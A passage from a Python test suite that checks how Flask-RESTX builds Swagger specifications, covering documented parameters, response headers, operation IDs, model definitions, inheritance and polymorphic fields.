assert parameter["description"] == "A query string"
def test_class_explicit_parameters(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={
"params": {
"q": {
"type": "string",
"in": "query",
"description": "A query string",
}
}
},
)
class ByNameResource(restx.Resource):
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 2
by_name = dict((p["name"], p) for p in path["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
parameter = by_name["q"]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
def test_explicit_parameters_override(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={
"params": {
"q": {
"type": "string",
"in": "query",
"description": "Overriden description",
},
"age": {"description": "An age"},
}
},
)
class ByNameResource(restx.Resource):
@api.doc(params={"q": {"description": "A query string"}})
def get(self, age):
return {}
def post(self, age):
pass
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
by_name = dict((p["name"], p) for p in path["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
# Don't duplicate parameters
assert "q" not in by_name
get = data["paths"]["/name/{age}/"]["get"]
assert len(get["parameters"]) == 1
parameter = get["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
post = data["paths"]["/name/{age}/"]["post"]
assert len(post["parameters"]) == 1
parameter = post["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "Overriden description"
def test_explicit_parameters_override_by_method(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={
"get": {
"params": {
"q": {
"type": "string",
"in": "query",
"description": "A query string",
}
}
},
"params": {"age": {"description": "An age"}},
},
)
class ByNameResource(restx.Resource):
@api.doc(params={"age": {"description": "Overriden"}})
def get(self, age):
return {}
def post(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert "parameters" not in path
get = path["get"]
assert len(get["parameters"]) == 2
by_name = dict((p["name"], p) for p in get["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "Overriden"
parameter = by_name["q"]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
post = path["post"]
assert len(post["parameters"]) == 1
by_name = dict((p["name"], p) for p in post["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
def test_parameters_cascading_with_apidoc_false(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={
"get": {
"params": {
"q": {
"type": "string",
"in": "query",
"description": "A query string",
}
}
},
"params": {"age": {"description": "An age"}},
},
)
class ByNameResource(restx.Resource):
@api.doc(params={"age": {"description": "Overriden"}})
def get(self, age):
return {}
@api.doc(False)
def post(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert "parameters" not in path
get = path["get"]
assert len(get["parameters"]) == 2
by_name = dict((p["name"], p) for p in get["parameters"])
assert "age" in by_name
assert "q" in by_name
assert "post" not in path
def test_explicit_parameters_desription_shortcut(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={
"get": {"params": {"q": "A query string",}},
"params": {"age": "An age"},
},
)
class ByNameResource(restx.Resource):
@api.doc(params={"age": "Overriden"})
def get(self, age):
return {}
def post(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert "parameters" not in path
get = path["get"]
assert len(get["parameters"]) == 2
by_name = dict((p["name"], p) for p in get["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "Overriden"
parameter = by_name["q"]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
post = path["post"]
assert len(post["parameters"]) == 1
by_name = dict((p["name"], p) for p in post["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
assert "q" not in by_name
def test_explicit_parameters_native_types(self, api, client):
@api.route("/types/", endpoint="native")
class NativeTypesResource(restx.Resource):
@api.doc(
params={
"int": {"type": int, "in": "query",},
"float": {"type": float, "in": "query",},
"bool": {"type": bool, "in": "query",},
"str": {"type": str, "in": "query",},
"int-array": {"type": [int], "in": "query",},
"float-array": {"type": [float], "in": "query",},
"bool-array": {"type": [bool], "in": "query",},
"str-array": {"type": [str], "in": "query",},
}
)
def get(self, age):
return {}
data = client.get_specs()
op = data["paths"]["/types/"]["get"]
parameters = dict((p["name"], p) for p in op["parameters"])
assert parameters["int"]["type"] == "integer"
assert parameters["float"]["type"] == "number"
assert parameters["str"]["type"] == "string"
assert parameters["bool"]["type"] == "boolean"
assert parameters["int-array"]["type"] == "array"
assert parameters["int-array"]["items"]["type"] == "integer"
assert parameters["float-array"]["type"] == "array"
assert parameters["float-array"]["items"]["type"] == "number"
assert parameters["str-array"]["type"] == "array"
assert parameters["str-array"]["items"]["type"] == "string"
assert parameters["bool-array"]["type"] == "array"
assert parameters["bool-array"]["items"]["type"] == "boolean"
def test_response_on_method(self, api, client):
api.model("ErrorModel", {"message": restx.fields.String,})
@api.route("/test/")
class ByNameResource(restx.Resource):
@api.doc(
responses={404: "Not found", 405: ("Some message", "ErrorModel"),}
)
def get(self):
return {}
data = client.get_specs("")
paths = data["paths"]
assert len(paths.keys()) == 1
op = paths["/test/"]["get"]
assert op["tags"] == ["default"]
assert op["responses"] == {
"404": {"description": "Not found",},
"405": {
"description": "Some message",
"schema": {"$ref": "#/definitions/ErrorModel",},
},
}
assert "definitions" in data
assert "ErrorModel" in data["definitions"]
def test_api_response(self, api, client):
@api.route("/test/")
class TestResource(restx.Resource):
@api.response(200, "Success")
def get(self):
pass
data = client.get_specs("")
paths = data["paths"]
op = paths["/test/"]["get"]
assert op["responses"] == {"200": {"description": "Success",}}
def test_api_response_multiple(self, api, client):
@api.route("/test/")
class TestResource(restx.Resource):
@api.response(200, "Success")
@api.response(400, "Validation error")
def get(self):
pass
data = client.get_specs("")
paths = data["paths"]
op = paths["/test/"]["get"]
assert op["responses"] == {
"200": {"description": "Success",},
"400": {"description": "Validation error",},
}
def test_api_response_with_model(self, api, client):
model = api.model("SomeModel", {"message": restx.fields.String,})
@api.route("/test/")
class TestResource(restx.Resource):
@api.response(200, "Success", model)
def get(self):
pass
data = client.get_specs("")
paths = data["paths"]
op = paths["/test/"]["get"]
assert op["responses"] == {
"200": {
"description": "Success",
"schema": {"$ref": "#/definitions/SomeModel",},
}
}
assert "SomeModel" in data["definitions"]
def test_api_response_default(self, api, client):
@api.route("/test/")
class TestResource(restx.Resource):
@api.response("default", "Error")
def get(self):
pass
data = client.get_specs("")
paths = data["paths"]
op = paths["/test/"]["get"]
assert op["responses"] == {"default": {"description": "Error",}}
def test_api_header(self, api, client):
@api.route("/test/")
@api.header("X-HEADER", "A class header")
class TestResource(restx.Resource):
@api.header(
"X-HEADER-2", "Another header", type=[int], collectionFormat="csv"
)
@api.header("X-HEADER-3", type=int)
@api.header("X-HEADER-4", type="boolean")
def get(self):
pass
data = client.get_specs("")
headers = data["paths"]["/test/"]["get"]["responses"]["200"]["headers"]
assert "X-HEADER" in headers
assert headers["X-HEADER"] == {
"type": "string",
"description": "A class header",
}
assert "X-HEADER-2" in headers
assert headers["X-HEADER-2"] == {
"type": "array",
"items": {"type": "integer"},
"description": "Another header",
"collectionFormat": "csv",
}
assert "X-HEADER-3" in headers
assert headers["X-HEADER-3"] == {"type": "integer"}
assert "X-HEADER-4" in headers
assert headers["X-HEADER-4"] == {"type": "boolean"}
def test_response_header(self, api, client):
@api.route("/test/")
class TestResource(restx.Resource):
@api.response(200, "Success")
@api.response(400, "Validation", headers={"X-HEADER": "An header"})
def get(self):
pass
data = client.get_specs("")
headers = data["paths"]["/test/"]["get"]["responses"]["400"]["headers"]
assert "X-HEADER" in headers
assert headers["X-HEADER"] == {
"type": "string",
"description": "An header",
}
def test_api_and_response_header(self, api, client):
@api.route("/test/")
@api.header("X-HEADER", "A class header")
class TestResource(restx.Resource):
@api.header("X-HEADER-2", type=int)
@api.response(200, "Success")
@api.response(400, "Validation", headers={"X-ERROR": "An error header"})
def get(self):
pass
data = client.get_specs("")
headers200 = data["paths"]["/test/"]["get"]["responses"]["200"]["headers"]
headers400 = data["paths"]["/test/"]["get"]["responses"]["400"]["headers"]
for headers in (headers200, headers400):
assert "X-HEADER" in headers
assert "X-HEADER-2" in headers
assert "X-ERROR" in headers400
assert "X-ERROR" not in headers200
def test_expect_header(self, api, client):
parser = api.parser()
parser.add_argument(
"X-Header", location="headers", required=True, help="A required header"
)
parser.add_argument(
"X-Header-2",
location="headers",
type=int,
action="split",
help="Another header",
)
parser.add_argument("X-Header-3", location="headers", type=int)
parser.add_argument("X-Header-4", location="headers", type=inputs.boolean)
@api.route("/test/")
class TestResource(restx.Resource):
@api.expect(parser)
def get(self):
pass
data = client.get_specs("")
parameters = data["paths"]["/test/"]["get"]["parameters"]
def get_param(name):
candidates = [p for p in parameters if p["name"] == name]
assert len(candidates) == 1, "parameter {0} not found".format(name)
return candidates[0]
parameter = get_param("X-Header")
assert parameter["type"] == "string"
assert parameter["in"] == "header"
assert parameter["required"] is True
assert parameter["description"] == "A required header"
parameter = get_param("X-Header-2")
assert parameter["type"] == "array"
assert parameter["in"] == "header"
assert parameter["items"]["type"] == "integer"
assert parameter["description"] == "Another header"
assert parameter["collectionFormat"] == "csv"
parameter = get_param("X-Header-3")
assert parameter["type"] == "integer"
assert parameter["in"] == "header"
parameter = get_param("X-Header-4")
assert parameter["type"] == "boolean"
assert parameter["in"] == "header"
def test_description(self, api, client):
@api.route(
"/description/",
endpoint="description",
doc={
"description": "Parent description.",
"delete": {"description": "A delete operation"},
},
)
class ResourceWithDescription(restx.Resource):
@api.doc(description="Some details")
def get(self):
return {}
def post(self):
"""
Do something.
Extra description
"""
return {}
def put(self):
"""No description (only summary)"""
def delete(self):
"""No description (only summary)"""
@api.route("/descriptionless/", endpoint="descriptionless")
class ResourceWithoutDescription(restx.Resource):
def get(self):
"""No description (only summary)"""
return {}
data = client.get_specs()
description = lambda m: data["paths"]["/description/"][m]["description"] # noqa
assert description("get") == dedent(
"""\
Parent description.
Some details"""
)
assert description("post") == dedent(
"""\
Parent description.
Extra description"""
)
assert description("delete") == dedent(
"""\
Parent description.
A delete operation"""
)
assert description("put") == "Parent description."
assert "description" not in data["paths"]["/descriptionless/"]["get"]
def test_operation_id(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
@api.doc(id="get_objects")
def get(self):
return {}
def post(self):
return {}
data = client.get_specs()
path = data["paths"]["/test/"]
assert path["get"]["operationId"] == "get_objects"
assert path["post"]["operationId"] == "post_test_resource"
def test_operation_id_shortcut(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
@api.doc("get_objects")
def get(self):
return {}
data = client.get_specs()
path = data["paths"]["/test/"]
assert path["get"]["operationId"] == "get_objects"
def test_custom_default_operation_id(self, app, client):
def default_id(resource, method):
return "{0}{1}".format(method, resource)
api = restx.Api(app, default_id=default_id)
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
@api.doc(id="get_objects")
def get(self):
return {}
def post(self):
return {}
data = client.get_specs()
path = data["paths"]["/test/"]
assert path["get"]["operationId"] == "get_objects"
assert path["post"]["operationId"] == "postTestResource"
@pytest.mark.api(default_id=lambda r, m: "{0}{1}".format(m, r))
def test_custom_default_operation_id_blueprint(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
@api.doc(id="get_objects")
def get(self):
return {}
def post(self):
return {}
data = client.get_specs()
path = data["paths"]["/test/"]
assert path["get"]["operationId"] == "get_objects"
assert path["post"]["operationId"] == "postTestResource"
def test_model_primitive_types(self, api, client):
@api.route("/model-int/")
class ModelInt(restx.Resource):
@api.doc(model=int)
def get(self):
return {}
data = client.get_specs()
assert "definitions" not in data
assert data["paths"]["/model-int/"]["get"]["responses"] == {
"200": {"description": "Success", "schema": {"type": "integer"}}
}
def test_model_as_flat_dict(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.doc(model=fields)
def get(self):
return {}
@api.doc(model="Person")
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
path = data["paths"]["/model-as-dict/"]
assert (
path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
)
assert (
path["post"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
)
def test_model_as_nested_dict(self, api, client):
address_fields = api.model("Address", {"road": restx.fields.String,})
fields = api.model("Person", {"address": restx.fields.Nested(address_fields)})
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.doc(model=fields)
def get(self):
return {}
@api.doc(model="Person")
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {"address": {"$ref": "#/definitions/Address"},},
"type": "object",
}
assert "Address" in data["definitions"]
assert data["definitions"]["Address"] == {
"properties": {"road": {"type": "string"},},
"type": "object",
}
path = data["paths"]["/model-as-dict/"]
assert (
path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
)
assert (
path["post"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
)
def test_model_as_nested_dict_with_details(self, api, client):
address_fields = api.model("Address", {"road": restx.fields.String,})
fields = api.model(
"Person",
{
"address": restx.fields.Nested(
address_fields, description="description", readonly=True
)
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.doc(model=fields)
def get(self):
return {}
@api.doc(model="Person")
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"address": {
"description": "description",
"readOnly": True,
"allOf": [{"$ref": "#/definitions/Address"}],
},
},
"type": "object",
}
assert "Address" in data["definitions"]
assert data["definitions"]["Address"] == {
"properties": {"road": {"type": "string"},},
"type": "object",
}
def test_model_as_flat_dict_with_marchal_decorator(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.marshal_with(fields)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
responses = data["paths"]["/model-as-dict/"]["get"]["responses"]
assert responses == {
"200": {
"description": "Success",
"schema": {"$ref": "#/definitions/Person"},
}
}
def test_model_with_non_uri_chars_in_name(self, api, client):
# name will be encoded as 'Person%2F%2F%3Flots%7B%7D%20of%20%26illegals%40%60'
name = "Person//?lots{} of &illegals@`"
fields = api.model(name, {})
@api.route("/model-bad-uri/")
class ModelBadUri(restx.Resource):
@api.doc(model=fields)
def get(self):
return {}
@api.response(201, "", model=name)
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert name in data["definitions"]
path = data["paths"]["/model-bad-uri/"]
assert (
path["get"]["responses"]["200"]["schema"]["$ref"]
== "#/definitions/Person%2F%2F%3Flots%7B%7D%20of%20%26illegals%40%60"
)
assert (
path["post"]["responses"]["201"]["schema"]["$ref"]
== "#/definitions/Person%2F%2F%3Flots%7B%7D%20of%20%26illegals%40%60"
)
def test_marchal_decorator_with_code(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.marshal_with(fields, code=204)
def delete(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
responses = data["paths"]["/model-as-dict/"]["delete"]["responses"]
assert responses == {
"204": {
"description": "Success",
"schema": {"$ref": "#/definitions/Person"},
}
}
def test_marchal_decorator_with_description(self, api, client):
person = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.marshal_with(person, description="Some details")
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
responses = data["paths"]["/model-as-dict/"]["get"]["responses"]
assert responses == {
"200": {
"description": "Some details",
"schema": {"$ref": "#/definitions/Person"},
}
}
def test_marhsal_decorator_with_envelope(self, api, client):
person = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.marshal_with(person, envelope="person")
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
responses = data["paths"]["/model-as-dict/"]["get"]["responses"]
assert responses == {
"200": {
"description": "Success",
"schema": {"properties": {"person": {"$ref": "#/definitions/Person"}}},
}
}
def test_model_as_flat_dict_with_marchal_decorator_list(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.marshal_with(fields, as_list=True)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"name": {"type": "string"},
"age": {"type": "integer"},
"birthdate": {"type": "string", "format": "date-time"},
},
"type": "object",
}
path = data["paths"]["/model-as-dict/"]
assert path["get"]["responses"]["200"]["schema"] == {
"type": "array",
"items": {"$ref": "#/definitions/Person"},
}
def test_model_as_flat_dict_with_marchal_decorator_list_alt(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.marshal_list_with(fields)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
path = data["paths"]["/model-as-dict/"]
assert path["get"]["responses"]["200"]["schema"] == {
"type": "array",
"items": {"$ref": "#/definitions/Person"},
}
def test_model_as_flat_dict_with_marchal_decorator_list_kwargs(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.marshal_list_with(fields, code=201, description="Some details")
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
path = data["paths"]["/model-as-dict/"]
assert path["get"]["responses"] == {
"201": {
"description": "Some details",
"schema": {"type": "array", "items": {"$ref": "#/definitions/Person"},},
}
}
def test_model_as_dict_with_list(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"tags": restx.fields.List(restx.fields.String),
},
)
@api.route("/model-with-list/")
class ModelAsDict(restx.Resource):
@api.doc(model=fields)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"name": {"type": "string"},
"age": {"type": "integer"},
"tags": {"type": "array", "items": {"type": "string"}},
},
"type": "object",
}
path = data["paths"]["/model-with-list/"]
assert path["get"]["responses"]["200"]["schema"] == {
"$ref": "#/definitions/Person"
}
def test_model_as_nested_dict_with_list(self, api, client):
address = api.model("Address", {"road": restx.fields.String,})
person = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
"addresses": restx.fields.List(restx.fields.Nested(address)),
},
)
@api.route("/model-with-list/")
class ModelAsDict(restx.Resource):
@api.doc(model=person)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert "Address" in data["definitions"]
def test_model_list_of_primitive_types(self, api, client):
@api.route("/model-list/")
class ModelAsDict(restx.Resource):
@api.doc(model=[int])
def get(self):
return {}
@api.doc(model=[str])
def post(self):
return {}
data = client.get_specs()
assert "definitions" not in data
path = data["paths"]["/model-list/"]
assert path["get"]["responses"]["200"]["schema"] == {
"type": "array",
"items": {"type": "integer"},
}
assert path["post"]["responses"]["200"]["schema"] == {
"type": "array",
"items": {"type": "string"},
}
def test_model_list_as_flat_dict(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.doc(model=[fields])
def get(self):
return {}
@api.doc(model=["Person"])
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
path = data["paths"]["/model-as-dict/"]
for method in "get", "post":
assert path[method]["responses"]["200"]["schema"] == {
"type": "array",
"items": {"$ref": "#/definitions/Person"},
}
def test_model_doc_on_class(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
@api.doc(model=fields)
class ModelAsDict(restx.Resource):
def get(self):
return {}
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
path = data["paths"]["/model-as-dict/"]
for method in "get", "post":
assert path[method]["responses"]["200"]["schema"] == {
"$ref": "#/definitions/Person"
}
def test_model_doc_for_method_on_class(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
@api.doc(get={"model": fields})
class ModelAsDict(restx.Resource):
def get(self):
return {}
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
path = data["paths"]["/model-as-dict/"]
assert path["get"]["responses"]["200"]["schema"] == {
"$ref": "#/definitions/Person"
}
assert "schema" not in path["post"]["responses"]["200"]
def test_model_with_discriminator(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String(discriminator=True),
"age": restx.fields.Integer,
},
)
@api.route("/model-with-discriminator/")
class ModelAsDict(restx.Resource):
@api.marshal_with(fields)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {"name": {"type": "string"}, "age": {"type": "integer"},},
"discriminator": "name",
"required": ["name"],
"type": "object",
}
def test_model_with_discriminator_override_require(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String(discriminator=True, required=False),
"age": restx.fields.Integer,
},
)
@api.route("/model-with-discriminator/")
class ModelAsDict(restx.Resource):
@api.marshal_with(fields)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {"name": {"type": "string"}, "age": {"type": "integer"},},
"discriminator": "name",
"required": ["name"],
"type": "object",
}
def test_model_not_found(self, api, client):
@api.route("/model-not-found/")
class ModelAsDict(restx.Resource):
@api.doc(model="NotFound")
def get(self):
return {}
client.get_specs(status=500)
def test_specs_no_duplicate_response_keys(self, api, client):
"""
This tests that the swagger.json document will not be written with duplicate object keys
due to the coercion of dict keys to string. The last @api.response should win.
"""
# Note the use of a strings '404' and '200' in class decorators as opposed to ints in method decorators.
@api.response("404", "Not Found")
class BaseResource(restx.Resource):
def get(self):
pass
model = api.model("SomeModel", {"message": restx.fields.String,})
@api.route("/test/")
@api.response("200", "Success")
class TestResource(BaseResource):
# @api.marshal_with also yields a response
@api.marshal_with(model, code=200, description="Success on method")
@api.response(404, "Not Found on method")
def get(self):
{}
data = client.get_specs("")
paths = data["paths"]
op = paths["/test/"]["get"]
print(op["responses"])
assert op["responses"] == {
"200": {
"description": "Success on method",
"schema": {"$ref": "#/definitions/SomeModel"},
},
"404": {"description": "Not Found on method",},
}
def test_clone(self, api, client):
parent = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
child = api.clone("Child", parent, {"extra": restx.fields.String,})
@api.route("/extend/")
class ModelAsDict(restx.Resource):
@api.doc(model=child)
def get(self):
return {}
@api.doc(model="Child")
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" not in data["definitions"]
assert "Child" in data["definitions"]
path = data["paths"]["/extend/"]
assert (
path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Child"
)
assert (
path["post"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Child"
)
def test_inherit(self, api, client):
parent = api.model(
"Person", {"name": restx.fields.String, "age": restx.fields.Integer,}
)
child = api.inherit("Child", parent, {"extra": restx.fields.String,})
@api.route("/inherit/")
class ModelAsDict(restx.Resource):
@api.marshal_with(child)
def get(self):
return {
"name": "John",
"age": 42,
"extra": "test",
}
@api.doc(model="Child")
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert "Child" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {"name": {"type": "string"}, "age": {"type": "integer"},},
"type": "object",
}
assert data["definitions"]["Child"] == {
"allOf": [
{"$ref": "#/definitions/Person"},
{"properties": {"extra": {"type": "string"}}, "type": "object"},
]
}
path = data["paths"]["/inherit/"]
assert (
path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Child"
)
assert (
path["post"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Child"
)
data = client.get_json("/inherit/")
assert data == {
"name": "John",
"age": 42,
"extra": "test",
}
def test_inherit_inline(self, api, client):
parent = api.model(
"Person", {"name": restx.fields.String, "age": restx.fields.Integer,}
)
child = api.inherit("Child", parent, {"extra": restx.fields.String,})
output = api.model(
"Output",
{
"child": restx.fields.Nested(child),
"children": restx.fields.List(restx.fields.Nested(child)),
},
)
@api.route("/inherit/")
class ModelAsDict(restx.Resource):
@api.marshal_with(output)
def get(self):
return {
"child": {"name": "John", "age": 42, "extra": "test",},
"children": [
{"name": "John", "age": 42, "extra": "test",},
{"name": "Doe", "age": 33, "extra": "test2",},
],
}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert "Child" in data["definitions"]
data = client.get_json("/inherit/")
assert data == {
"child": {"name": "John", "age": 42, "extra": "test",},
"children": [
{"name": "John", "age": 42, "extra": "test",},
{"name": "Doe", "age": 33, "extra": "test2",},
],
}
def test_polymorph_inherit(self, api, client):
class Child1:
pass
class Child2:
pass
parent = api.model(
"Person", {"name": restx.fields.String, "age": restx.fields.Integer,}
)
child1 = api.inherit("Child1", parent, {"extra1": restx.fields.String,})
child2 = api.inherit("Child2", parent, {"extra2": restx.fields.String,})
mapping = {
Child1: child1,
Child2: child2,
}
output = api.model("Output", {"child": restx.fields.Polymorph(mapping)})
@api.route("/polymorph/")
class ModelAsDict(restx.Resource):
@api.marshal_with(output)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert "Child1" in data["definitions"]
assert "Child2" in data["definitions"]
assert "Output" in data["definitions"]
path = data["paths"]["/polymorph/"]
assert (
path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Output"
)
def test_polymorph_inherit_list(self, api, client):
class Child1(object):
name = "Child1"
extra1 = "extra1"
class Child2(object):
name = "Child2"
extra2 = "extra2"
parent = api.model("Person", {"name": restx.fields.String,})
child1 = api.inherit("Child1", parent, {"extra1": restx.fields.String,})
child2 = api.inherit("Child2", parent, {"extra2": restx.fields.String,})
mapping = {
Child1: child1,
Child2: child2,
}
output = api.model(
"Output", {"children": restx.fields.List(restx.fields.Polymorph(mapping))}
)
@api.route("/polymorph/")
class ModelAsDict(restx.Resource):
@api.marshal_with(output)
def get(self):
return {"children": [Child1(), Child2()]}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert "Child1" in data["definitions"]
assert "Child2" in data["definitions"]
assert "Output" in data["definitions"]
path = data["paths"]["/polymorph/"]
assert (
path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Output"
)
data = client.get_json("/polymorph/")
assert data == {
"children": [
{"name": "Child1", "extra1": "extra1",},
{"name": "Child2", "extra2": "extra2",},
]
}
def test_expect_model(self, api, client):
person = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.expect(person)
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"name": {"type": "string"},
"age": {"type": "integer"},
"birthdate": {"type": "string", "format": "date-time"},
},
"type": "object",
}
op = data["paths"]["/model-as-dict/"]["post"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter == {
"name": "payload",
"in": "body",
"required": True,
"schema": {"$ref": "#/definitions/Person"},
}
assert "description" not in parameter
def test_body_model_shortcut(self, api, client):
fields = api.model(
"Person",
{
